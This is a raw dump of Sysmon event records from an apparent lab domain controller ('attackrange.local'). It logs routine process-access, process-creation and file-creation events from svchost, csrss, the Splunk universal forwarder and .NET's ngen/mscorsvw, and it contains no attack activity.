Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005459Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:48.064{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005458Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:48.064{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005457Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:48.064{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005456Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:48.064{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005455Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:48.064{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005454Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:48.064{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005453Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:48.064{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005452Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:48.064{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005451Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:48.064{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005450Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:48.064{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-90D0-6005-4301-00000000A301}4820C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005449Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:48.064{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-90D0-6005-4301-00000000A301}4820C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005448Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:48.065{59A5CD1D-90D0-6005-4301-00000000A301}4820C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000005482Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:49.798{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-90D1-6005-4601-00000000A301}3176C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005481Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:49.783{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-90D1-6005-4601-00000000A301}3176C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005480Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:49.783{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-90D1-6005-4601-00000000A301}3176C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005479Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:49.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-90D1-6005-4501-00000000A301}3088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005478Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:49.376{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-90D1-6005-4501-00000000A301}3088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005477Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:49.376{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-90D1-6005-4501-00000000A301}3088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005476Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:49.033{59A5CD1D-90D0-6005-4401-00000000A301}47084804C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005475Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:44:49.017{59A5CD1D-90C7-6005-3E01-00000000A301}4688C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1250-0\System.Windows.Forms.dll2021-01-18 13:44:49.017 10341000x80000000000000005509Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:50.908{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-90D2-6005-4B01-00000000A301}3504C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005508Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:50.908{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-90D2-6005-4B01-00000000A301}3504C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005507Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:50.908{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-90D2-6005-4B01-00000000A301}3504C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005506Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:50.814{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-90D2-6005-4A01-00000000A301}1156C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005505Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:50.798{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-90D2-6005-4A01-00000000A301}1156C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005504Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:50.798{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-90D2-6005-4A01-00000000A301}1156C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005503Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 